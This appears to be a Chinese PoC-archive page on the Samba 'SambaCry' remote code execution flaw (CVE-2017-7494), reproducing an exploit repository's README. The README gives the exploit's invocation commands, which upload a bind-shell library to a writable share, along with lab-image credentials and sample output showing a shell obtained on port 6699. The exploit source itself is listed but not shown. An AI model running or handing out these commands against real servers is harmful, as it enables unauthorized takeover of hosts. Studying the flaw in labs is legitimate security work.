关联漏洞
标题:
Samba 安全漏洞
(CVE-2017-7494)
描述:Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。 Samba中存在远程代码执行漏洞。远程攻击者可利用该漏洞使服务器加载和执行上传的共享库。以下版本受到影响:Samba 4.6.4之前的版本,4.5.10之前的版本,4.4.14之前的版本。
描述
SambaCry exploit (CVE-2017-7494)
介绍
# SambaCry RCE exploit for Samba 4.5.9
Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services for various Microsoft Windows clients and can integrate with a Microsoft Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Microsoft Windows NT domains.
Samba in **4.5.9** version and before that is vulnerable to a remote code execution vulnerability named **SambaCry**. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
## Exploit
Use `poetry` to setup the environment for this exploit
```
pip3 install -r requirements.txt
```
After that you can run it as the following:
```
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
```
For example, if you use the vulnerable image from `vulnerables/cve-2017-7494` and want to run this exploit against it:
```
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
```
And you will get the following output
```
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
```
# Kudos
The payload for this project, along with the code was heavily inspired by `opsxcq/exploit-CVE-2017-7494`.
文件快照
[4.0K] /data/pocs/5eee0c98126e6f7f62d2a77780faef9aa7dc2ae3
├── [1.9K] bindshell-samba.c
├── [ 138] bindshell-samba.h
├── [3.9K] exploit.py
├── [2.2K] README.md
└── [ 62] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。